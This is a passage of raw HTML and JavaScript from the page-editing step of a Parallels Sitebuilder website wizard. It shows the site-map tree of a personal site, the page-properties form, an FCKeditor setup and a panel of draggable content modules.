<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
<div style="height: 180px; border-style: solid; border-width: 0px; width: 100%; overflow-y: auto; overflow-x: auto; overflow: auto; float: left;"><table cellspacing="1" border="0" style="width: 100%;" align="center" id="StatusDetailedMessages">
<tr class="sb-gridview-header" align="left" style="height: 24px; white-space: nowrap;">
<th style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" scope="col">#</th>
<th style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" scope="col">S</th>
<th style="padding-left: 4px; padding-right: 4px;" scope="col">Message</th>
</tr>
<tr class="0" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
<tr class="1" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; font-wight: bold; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
</table></div>
<div style="padding-top: 7px; width: 100%;"><table align="right" onclick="sb_status.hideDetails();return false; return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Close</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></div>
</div></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('StatusDetailed');
       </script><script type="text/javascript" language="javascript" src="/js/wizard.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript" src="/js/navigation.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
           var baseUrl='';
           var sbNavigationObject;
           sbNavigationObject = new SB_Navigation('SB_WizardForm', '/Wizard/Edit/Html');
           </script><form name="SB_WizardForm" method="post" enctype="multipart/form-data" onsubmit="return wizardFormSubmit();" action="/Wizard/Edit/Html"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%">
<tr id="TRHeader"><td COLSPAN="2">
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-top-container"><tr><td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;" class="sb-header-top"><tr>
<td width="100%"><div style="width: 205px; text-align: center;"><img align="middle" style="cursor: pointer;" alt="" border="0" src="/skins/WinXPReloadedCompact/images/def_sb_logo.gif?5.0.0.2009110318" onclick="window.open('http://www.parallels.com', '_new'); return false;"></div></td>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;border-collapse:collapse;"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Start');" style="cursor: pointer;"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_left.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_start_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Start</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Design');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_design_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Design</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Pages');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_pages_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Pages</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_al.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_edit_abullet.gif"></td>
<td class="sb-steps-text-active" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);">Edit</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_ar.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Publish');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_publish_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Publish</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_right.gif"></td>
</tr></table></td>
</tr></table></td>
<td align="right" class="sb-header-company-logo"><img style="cursor: pointer" onclick="window.open('http://www.parallels.com', '_new'); return false;" border="0" src="/skins/WinXPReloadedCompact/images/def_parallels_logo_wizard.gif"></td>
</tr></table></td></tr></table>
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-bottom"><tr>
<td style="padding-left: 10px;">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       " class="" id="saveChangesButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/button_middle.gif);padding-left:5px;padding-right:5px;" class=""><img src="/skins/WinXPReloadedCompact/icons/save_icon.gif"></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="saveChangesButtonMainText">Save Changes</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<script type="text/javascript">
                           sbApplyChangesObject.addListener(enableSaveChangesButton);
                       </script>
</td>
<td style="padding-left: 10px; width: 100%;" onclick="sb_status.showDetails();" id="StatusBar">
<table cellpadding="0" cellspacing="3" width="100%" border="0" style="display:inline-block;width:100%;"><tr>
<td valign="middle"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_help.gif"></td>
<td valign="middle" width="100%" style="padding-left: 10px;"><div id="StatusMessage" class="sb-statusbar-text">Create and edit the content of your web site.</div></td>
</tr></table>
<script type="text/javascript" language="javascript" src="/js/Wizard/Status.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
                       sb_status = new SB_Status('/skins/WinXPReloadedCompact');
                       </script>
</td>
<td class="sb-header-bottom-right"><table cellspacing="0" cellpadding="0" border="0" style="height: 100%;"><tr><td><a style="text-decoration: none" onclick="javascript:try{window.open('http://download1.parallels.com/PPSMBE/10.0.0/Doc/help.htm?locale=en-US&amp;article=/Wizard/Edit/Html&amp;help_type=user','_blank')}catch(e){}; void(0);" href="#"><table cellpadding="0" cellspacing="0" border="0" type="button" style="height:100%;"><tr>
<td style="padding: 5px;"><img style="border-width:0px;" width="16" height="16" src="/skins/WinXPReloadedCompact/icons/help.png"></td>
<td class="sb-tools-text" style="padding-right:10px;">Help</td>
</tr></table></a></td></tr></table></td>
</tr></table>
</td></tr>
<tr><td class="sb-wizard-layout-content">
<script type="text/javascript" src="/js/Wizard/panel_toogle.js?5.0.0.2009110318"></script><table border="0" cellpadding="0" cellspacing="0" style="height: 100%;width:100%" align="center"><tr><td style="vertical-align: top; " align="center"><table cellpadding="0" cellspacing="0" border="0" style="height: 100%;width:100%"><tr>
<td valign="top">
<input type="hidden" id="LeftPanelDiv_hidden" value="false"><input type="hidden" id="LeftPanelDiv_show_action" value="localeCode=en_US&amp;section=Wizard_Edit&amp;key=showSiteMap"><input type="hidden" id="LeftPanelDiv_hide_action" value="localeCode=en_US&amp;section=Wizard_Edit&amp;key=hideSiteMap"><table style="height:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-edit-panel"><tr>
<td><div id="LeftPanelDiv" style="height: 100%; display: block;"><table width="200" cellspacing="8" cellpadding="8" border="0">
<tr valign="top" height="1"><td><b class="sb-text">Site map</b></td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="siteMapTd" valign="top" height="1">
<script src="/js/Wizard/Edit.js?5.0.0.2009110318" language="javascript"></script><script type="text/javascript" language="javascript"><!--
                                           var currentPageId = 'q485ez4jvyq';
                                           var action = '/Wizard/Edit';
                                           Event.observe(window, 'load', siteMapOnResize);
                                           Event.observe(window, 'resize', siteMapOnResize);
                                           //--></script><table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%" style="table-layout: fixed;"><tr><td valign="top">
<script type="text/javascript" language="javascript" src="/js/pages_tree.js?5.0.0.2009110318"></script><div id="edit" style="white-space: nowrap; overflow-x: hidden; overflow-y: auto; width:100%; height:100%;">
<script type="text/javascript" language="javascript"><!--
                   SbInitTree('edit', 'true', 'true', '', '', 'true', onNodeSelect, null, null, null);
                   var tree = document.getElementById('edit');
                   
               //--></script><div id="q485ez4jvyq" valign="middle">
<img id="q485ez4jvyqState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q485ez4jvyqLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q485ez4jvyqCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q485ez4jvyqIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q485ez4jvyqSpan" style="vertical-align: middle;">Home</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q485ez4jvyq', 'page1.php', 'Simple', 'true', '', 'visible');
       </script><div id="hwal3pvmvz3" valign="middle">
<img id="hwal3pvmvz3State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="hwal3pvmvz3Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="hwal3pvmvz3Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="hwal3pvmvz3Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="hwal3pvmvz3Span" style="vertical-align: middle;">About Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'hwal3pvmvz3', 'page2.php', 'Simple', '', '', 'visible');
       </script><div id="b1ynn2c224e" valign="middle">
<img id="b1ynn2c224eState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="b1ynn2c224eLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="b1ynn2c224eCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="b1ynn2c224eIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="b1ynn2c224eSpan" style="vertical-align: middle;">My Family</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'b1ynn2c224e', 'page3.php', 'Simple', '', '', 'visible');
       </script><div id="1iqsyi3rp1o" valign="middle">
<img id="1iqsyi3rp1oState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1iqsyi3rp1oLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1iqsyi3rp1oCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1iqsyi3rp1oIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/modules/ImageGallery/images/icon.gif"><span id="1iqsyi3rp1oSpan" style="vertical-align: middle;">Photos</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1iqsyi3rp1o', 'page4.php', 'ImageGallery', '', '', 'visible');
       </script><div id="1mhpsivotpo" valign="middle">
<img id="1mhpsivotpoState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1mhpsivotpoLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1mhpsivotpoCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1mhpsivotpoIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="1mhpsivotpoSpan" style="vertical-align: middle;">Resume</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1mhpsivotpo', 'page5.php', 'Simple', '', '', 'visible');
       </script><div id="q05ufw2vwxb" valign="middle">
<img id="q05ufw2vwxbState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q05ufw2vwxbLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q05ufw2vwxbCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q05ufw2vwxbIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q05ufw2vwxbSpan" style="vertical-align: middle;">Favorite Links</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q05ufw2vwxb', 'page6.php', 'Simple', '', '', 'visible');
       </script><div id="pp2btyiv601" valign="middle">
<img id="pp2btyiv601State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="pp2btyiv601Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="pp2btyiv601Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="pp2btyiv601Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="pp2btyiv601Span" style="vertical-align: middle;">Contact Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'pp2btyiv601', 'page7.php', 'Simple', '', '', 'visible');
       </script>
</div>
<script type="text/javascript" language="javascript"><!--
               SbRefreshTree('edit');
           //--></script>
</td></tr></table>
<script type="text/javascript" language="javascript">
                           var knownPagesFileNames = new Array('index');
                           

       registerPageEditView('q485ez4jvyq', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page2');

       registerPageEditView('hwal3pvmvz3', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page3');

       registerPageEditView('b1ynn2c224e', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page4');

       registerPageEditView('1iqsyi3rp1o', '/Wizard/Edit/Modules/ImageGallery');
       knownPagesFileNames.push('page5');

       registerPageEditView('1mhpsivotpo', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page6');

       registerPageEditView('q05ufw2vwxb', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page7');

       registerPageEditView('pp2btyiv601', '/Wizard/Edit/Html');
       </script>
</td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="pageInfoTd" valign="top" height="1">
<script>
           sbNavigationObject.registerOnSubmitFunction(validateForm);
       </script><table height="160px" width="100%" border="0" cellpadding="0" cellspacing="0" style="table-layout: fixed;">
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page title</span><span style="color:Red; width: 10px;">*</span><br><input id="pageTitle" name="pageTitle" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();" value="Home">
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page file name</span><span style="color:Red; width: 10px;">*</span><br><input id="pageFileName" name="pageFileName" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:140px;" onchange="self.sbApplyChangesObject.registerChange();" value="page1"><span class="sb-text">.php</span>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page keywords</span><br><textarea id="pageKeywords" name="pageKeywords" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page description</span><br><textarea id="pageDescription" name="pageDescription" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td>
<span style="color:Red; padding-right: 5px;">*</span><span class="sb-text">Required fields</span><br>
</td></tr>
<tr><td style="height: 20px;"><img width="100%" height="1" src="/skins/WinXPReloadedCompact/images/line.gif"></td></tr>
<tr><td><table cellpadding="0" cellspacing="0" border="0" class="control-input-title"><tr>
<td class="input-block"><input id="pageShowInNavigation" type="checkbox" name="pageShowInNavigation" onchange="self.sbApplyChangesObject.registerChange();" class="sb-check" checked></td>
<td class="title-block"><label class="name" for="pageShowInNavigation">Show this page in site map</label></td>
</tr></table></td></tr>
<tr><td align="center" style="padding-top: 10px">
<table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;width: 100%" class="" id="plainPageButton" onclick="plainPageButtonOnClick();"><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="plainPageButtonMainText">Remove Design Template</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<input type="hidden" id="isPlainPage" name="isPlainPage" value="0">
</td></tr>
</table>
<input type="hidden" name="currentPageId" id="page" value="q485ez4jvyq">
</td></tr>
</table></div></td>
<td style="height: 100%;" class="sb-edit-panel-hidebackground" id="LeftPanelDiv_Bar"><div id="ButtonHideTree" onclick="toggleLeftPanel('/skins/WinXPReloadedCompact/images/right.gif', '/skins/WinXPReloadedCompact/images/left.gif');" align="center" style="width: 21px; height: 100%; border: 0px solid #7D7D7D; float: left; cursor: hand; cursor: pointer;">
<img id="LeftPanelDiv_bullet" class="sb-edit-panel-arrow" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/left.gif"><br><img id="LeftPanelDiv_Text" style="border-width:0px;" src="/localizedimage.php?localeCode=en_US&amp;section=Wizard_Edit&amp;key=hideSiteMap">
</div></td>
</tr></table>
</td>
<td valign="top" style="width: 100%; height: 100%">
<script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="blockModuleSettingsBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="blockModuleSettings" style="margin:0px; padding:0px; height:520px; width:640px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="blockModuleSettingsHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="blockModuleSettingsTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;"></span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbBlockModuleEditorDialogObject.hide();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top">
<script type="text/javascript" src="/js/Wizard/modules_drag_and_drop.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/session.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
           self.sbSession = new SbSession('SessionID', '42b54cb11fc3aedbd');
           //--></script><table width="100%" cellspacing="0" cellpadding="0" border="0" align="center"><tr><td id="blockModuleSettingsFrame_holder"></td></tr></table>
</td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('blockModuleSettings');
       </script><script type="text/javascript" src="/js/Wizard/BlockModuleEditorDialog.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
               self.sbBlockModuleEditorDialogObject = new SbBlockModuleEditorDialog('blockModuleSettings', 'blockModuleSettingsFrame', 'blockModuleSettingsFrame_holder');
           //--></script><script type="text/javascript" src="/js/Wizard/modules_drag_and_drop.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/session.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
               self.sbSession = new SbSession('SessionID', '42b54cb11fc3aedbd');
               
               function FCKeditor_OnComplete(editorInstance) {
                   try {
                       wysiwygWin = $('wysiwyg___Frame').contentWindow;
                       wysiwyg = editorInstance;
                   } catch(e) {};
               }
               //--></script><script type="text/javascript" src="/js/Wizard/Wysiwyg/SbImageHelper.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Wizard/Wysiwyg/SbWysiwygForm.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Wizard/Wysiwyg/SbPreserveSelectionForm.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Wizard/Wysiwyg/SbImageFormLoader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Wizard/Wysiwyg/SbCropFormLoader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/wysiwyg/fckeditor.js?5.0.0.2009110318"></script><script type="text/javascript">
           var editableSiteFolder="/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/";
           self.siteFolder="/sites/78/78806f0057ebcbb04597bd12795bd6a6/";
           function Init_wysiwyg(editorFileFullPath) {
               if ('undefined'==typeof(editorFileFullPath)) {
                   var editorFileFullPath="/wysiwyg/custom/fckeditor.wizard.html?cacheId=5.0.0.2009110318&currentPageId=q485ez4jvyq&editFilePath=/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php";
               }
               wysiwyg= new FCKeditor('wysiwyg','100%','100%');
               wysiwyg.BasePath = '/wysiwyg//';                
               wysiwyg.Config["CustomConfigurationsPath"] = wysiwyg.BasePath + "/custom/config/wizard.js?5.0.0.2009110318";
               wysiwyg.Config["SkinPath"] = wysiwyg.BasePath + 'editor/skins/silver/';
               wysiwyg.ToolbarSet="wizard";
               wysiwyg.EditorFile="wizard";
               wysiwyg.EditorFileFullPath=editorFileFullPath;
               wysiwyg.Config["AutoDetectLanguage"] = false;
               wysiwyg.Config["DefaultLanguage"]="en";
               
               wysiwyg.Config["EditorAreaCSS"]=editableSiteFolder+"css/styles.css?template=personal-018&colorScheme=green&header=headers1&button=buttons1.5.0.0.2009110318";
               wysiwyg.Config["Version"]="5.0.0.2009110318";
               wysiwyg.ReplaceTextarea();
           }
           var wysiwyg=null;
           
               RegisterOnloadAction('Init_wysiwyg();');
           </script><textarea id="wysiwyg" name="wysiwyg" style="border-width: 0px;">&lt;p&gt;Type Content Here&lt;/p&gt;</textarea>
</td>
<td valign="top" class="sb-edit-panel">
<input type="hidden" id="RightPanelDiv_show_action" value="localeCode=en_US&amp;section=Wizard_Edit_Html&amp;key=showAvailableModules"><input type="hidden" id="RightPanelDiv_hide_action" value="localeCode=en_US&amp;section=Wizard_Edit_Html&amp;key=hideAvailableModules"><table style="height:100%;" cellpadding="0" cellspacing="0"><tr>
<td style="height: 100%;" class="sb-edit-panel-showbackground" id="RightPanelDiv_Bar"><div id="ButtonHideTree" onclick="toggleRightPanel('/skins/WinXPReloadedCompact/images/right.gif', '/skins/WinXPReloadedCompact/images/left.gif');" align="center" style="width: 21px; height: 100%; border: 0px solid #7D7D7D; float: left; cursor: hand; cursor: pointer;">
<img id="RightPanelDiv_bullet" class="sb-edit-panel-arrow" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/right.gif"><br><img id="RightPanelDiv_Text" style="border-width:0px;" src="/localizedimage.php?localeCode=en_US&amp;section=Wizard_Edit_Html&amp;key=hideAvailableModules"><script type="text/javascript" language="javascript"></script>
</div></td>
<td><div id="RightPanelDiv" style="height: 100%; display: block;">
<table cellpadding="0" cellspacing="0" width="85" border="0" style="height:100%;"><tr><td valign="top"><table style="height:100%; width:100%" border="0">
<tr align="center"><td style="padding-top:10px; height:30px">
<b class="sb-text">Modules</b><br><img src="/skins/WinXPReloadedCompact/images/line.gif" style="border-width:0px;">
</td></tr>
<tr align="center"><td valign="top" id="ModulePanel_Td"><div id="ModulePanel_Div" style="display: none; overflow-y: auto; overflow-x: hidden; white-space: nowrap; user-select: none; -moz-user-select: none;">
<span style="vertical-align:middle;" class="TreeNodeIcon" title="Feedback" id="doubleClick_module_Feedback"><table border="0">
<tr align="center"><td><div id="module_Feedback"><img border="0" width="32px" height="32px" src="/modules/Feedback/images/icon.gif"></div></td></tr>
<tr align="center"><td class="sb-text"><span>Feedback</span></td></tr>
</table></span><table border="0">
<tr align="center"><td><img border="0" src="/skins/WinXPReloadedCompact/images/line.gif" width=" 65px " height=" 1px "></td></tr>
<tr align="center"><td><span class="sb-text"></span></td></tr>
</table>
<script type="text/javascript" language="javascript"><!--
               var module = document.getElementById('module_Feedback');
               makeDraggable(module, 'Feedback');

               $('doubleClick_module_Feedback').observe('dblclick', function(event){
                   if ($(Event.element(event)).hasClassName('TreeNodeIcon')) {
                       containerElement = $(Event.element(event));
                   } else {
                       containerElement = $(Event.element(event)).up('.TreeNodeIcon');
                   }

                   moduleName = containerElement.id.replace(/^doubleClick_module_/, '');
                   insertNewBlockModule(moduleName);
               });
           //--></script><span style="vertical-align:middle;" class="TreeNodeIcon" title="Online Status Indicator" id="doubleClick_module_OnlineStatusIndicator"><table border="0">
<tr align="center"><td><div id="module_OnlineStatusIndicator"><img border="0" width="32px" height="32px" src="/modules/OnlineStatusIndicator/images/icon.gif"></div></td></tr>
<tr align="center"><td class="sb-text"><span>Online Status Indicator</span></td></tr>
</table></span><table border="0">
<tr align="center"><td><img border="0" src="/skins/WinXPReloadedCompact/images/line.gif" width=" 65px " height=" 1px "></td></tr>
<tr align="center"><td><span class="sb-text"></span></td></tr>
</table>
<script type="text/javascript" language="javascript"><!--
               var module = document.getElementById('module_OnlineStatusIndicator');
               makeDraggable(module, 'OnlineStatusIndicator');

               $('doubleClick_module_OnlineStatusIndicator').observe('dblclick', function(event){
                   if ($(Event.element(event)).hasClassName('TreeNodeIcon')) {
                       containerElement = $(Event.element(event));
                   } else {
                       containerElement = $(Event.element(event)).up('.TreeNodeIcon');
                   }

                   moduleName = containerElement.id.replace(/^doubleClick_module_/, '');
                   insertNewBlockModule(moduleName);
               });
           //--></script><span style="vertical-align:middle;" class="TreeNodeIcon" title="RSS Reader" id="doubleClick_module_RssReader"><table border="0">
<tr align="center"><td><div id="module_RssReader"><img border="0" width="32px" height="32px" src="/modules/RssReader/images/icon.gif"></div></td></tr>
<tr align="center"><td class="sb-text"><span>RSS Reader</span></td></tr>
</table></span><table border="0">
<tr align="center"><td><img border="0" src="/skins/WinXPReloadedCompact/images/line.gif" width=" 65px " height=" 1px "></td></tr>
<tr align="center"><td><span class="sb-text"></span></td></tr>
</table>
<script type="text/javascript" language="javascript"><!--
               var module = document.getElementById('module_RssReader');
               makeDraggable(module, 'RssReader');

               $('doubleClick_module_RssReader').observe('dblclick', function(event){
                   if ($(Event.element(event)).hasClassName('TreeNodeIcon')) {
                       containerElement = $(Event.element(event));
                   } else {
                       containerElement = $(Event.element(event)).up('.TreeNodeIcon');
                   }

                   moduleName = containerElement.id.replace(/^doubleClick_module_/, '');
                   insertNewBlockModule(moduleName);
               });
           //--></script><span style="vertical-align:middle;" class="TreeNodeIcon" title="Script" id="doubleClick_module_Script"><table border="0">
<tr align="center"><td><div id="module_Script"><img border="0" width="32px" height="32px" src="/modules/Script/images/icon.gif"></div></td></tr>
<tr align="center"><td class="sb-text"><span>Script</span></td></tr>
</table></span><table border="0">
